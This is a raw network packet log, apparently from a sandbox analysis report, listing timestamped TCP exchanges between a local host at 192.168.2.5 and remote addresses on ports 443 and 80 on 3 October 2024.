Oct 3, 2024 23:28:03.073198080 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.073355913 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.073452950 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.073503971 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.073823929 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.073873043 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.074347019 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.074390888 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.074767113 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.074820042 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.075119972 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.075222015 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.075743914 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.075793982 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.076237917 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.076292038 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.076627970 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.076678991 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.077477932 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.077523947 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.077708006 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.077756882 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.078341007 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.078392982 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.143583059 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.143699884 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.143855095 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.143922091 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.161834955 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.161930084 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.162221909 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.162391901 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.162503958 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.162573099 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.162955999 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.163013935 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.163254976 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.163314104 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.163728952 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.163788080 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.163786888 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.163820982 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.163857937 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.163867950 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.164179087 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.164237022 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.164711952 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.164767981 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.165079117 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.165138960 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.167128086 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.167197943 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.167387009 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.167442083 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.168020964 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.168073893 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.168082952 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.168088913 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.168124914 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232402086 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.232460022 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.232526064 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232543945 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.232583046 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232601881 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232709885 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.232739925 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232748032 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.232758045 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.232796907 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.251240969 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.251360893 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.251451015 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.251507044 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.251545906 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.251605988 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252053022 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252110958 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252545118 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252608061 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252729893 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252779961 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252787113 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252815962 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252830029 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252847910 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252862930 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252877951 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252877951 CEST	50000	443	192.168.2.5	23.145.40.164
Oct 3, 2024 23:28:03.252885103 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.252891064 CEST	443	50000	23.145.40.164	192.168.2.5
Oct 3, 2024 23:28:03.315996885 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:03.321156025 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:03.321218014 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:03.321330070 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:03.321346045 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:03.326275110 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:03.326363087 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.717483997 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.724641085 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.724708080 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.724880934 CEST	50001	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.729827881 CEST	80	50001	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.740655899 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.746866941 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.746948957 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.747276068 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.747324944 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:04.752496958 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:04.752528906 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.105165005 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.106595039 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.106667995 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.106708050 CEST	50002	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.110271931 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.112199068 CEST	80	50002	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.115272045 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.115360022 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.115504026 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.115504026 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:06.120512962 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:06.120779037 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:07.783315897 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:07.783355951 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:07.783474922 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:07.783592939 CEST	50003	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:28:07.790422916 CEST	80	50003	190.224.203.37	192.168.2.5
Oct 3, 2024 23:28:26.653513908 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:26.653548956 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:26.653614044 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:26.654006004 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:26.654021978 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.264236927 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.264307022 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.488631964 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.488660097 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.488872051 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.492536068 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.492536068 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.492588043 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.815535069 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.815555096 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.815643072 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.815660000 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.867731094 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.868416071 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.868424892 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.868490934 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.868549109 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.868555069 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.868829966 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.868890047 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.868897915 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.902383089 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.902441978 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.902451038 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.911530018 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.911537886 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.911592960 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.911602020 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955065012 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955070972 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955158949 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.955171108 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955713987 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955722094 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955769062 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955796003 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.955806017 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.955821991 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.963359118 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.963366985 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.963430882 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.963442087 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.982333899 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.982341051 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.982590914 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.982599020 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.989434004 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.989442110 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.989499092 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.989506960 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.989532948 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.989543915 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.989543915 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.997786999 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.997795105 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.997864008 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.997873068 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.998672009 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.998678923 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:27.998857021 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:27.998866081 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.030035973 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.030085087 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.030113935 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.030122995 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.030149937 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.041995049 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.042002916 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.042049885 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.042068958 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.042123079 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.049602985 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.049611092 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.049798012 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.049807072 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.050934076 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.050942898 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.051002979 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.051012993 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069252014 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069299936 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069328070 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.069336891 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069493055 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069500923 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069514036 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.069540977 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.069555044 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.076409101 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.076452017 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.076492071 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.076503038 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.076513052 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.076728106 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.076847076 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.076854944 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.084307909 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.084379911 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.084389925 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.085084915 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.085160017 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.085167885 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.097356081 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.097436905 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.097445011 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.097946882 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.098042965 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.098052025 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.104070902 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.104135990 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.104145050 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.116967916 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.117058039 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.117067099 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.128753901 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.128858089 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.128865957 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.129704952 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.129736900 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.129836082 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.129836082 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.129844904 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.136514902 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.136580944 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.136589050 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.137134075 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.137197971 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.137206078 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.138062000 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.138159037 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.138165951 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.138911009 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.139031887 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.139040947 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156045914 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156143904 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.156156063 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156306028 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156383038 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.156389952 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156725883 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156780005 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.156786919 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156909943 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.156986952 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.157052040 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.157089949 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.157728910 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.157742023 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.157756090 CEST	50004	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.157761097 CEST	443	50004	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.206815004 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.206852913 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.207133055 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.207434893 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.207462072 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.819194078 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.819274902 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.820333004 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.820348024 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.820550919 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:28.827056885 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.827091932 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:28.827119112 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.108831882 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.108871937 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.108923912 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.108983994 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.109009981 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.109034061 CEST	50005	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.109054089 CEST	443	50005	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.113342047 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.113379002 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.113461018 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.113892078 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.113919020 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.695812941 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.695960999 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.697057962 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.697077990 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.697304964 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.698415041 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.698498011 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.698508978 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.972326994 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.972378969 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.972505093 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.972505093 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.972548962 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.972584009 CEST	50006	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.972598076 CEST	443	50006	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.975591898 CEST	50007	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.975609064 CEST	443	50007	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:29.975919008 CEST	50007	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.975950956 CEST	50007	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:29.975954056 CEST	443	50007	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:30.591244936 CEST	443	50007	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:30.591322899 CEST	50007	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:30.592453003 CEST	50007	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:30.592466116 CEST	443	50007	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:30.592677116 CEST	443	50007	23.145.40.162	192.168.2.5
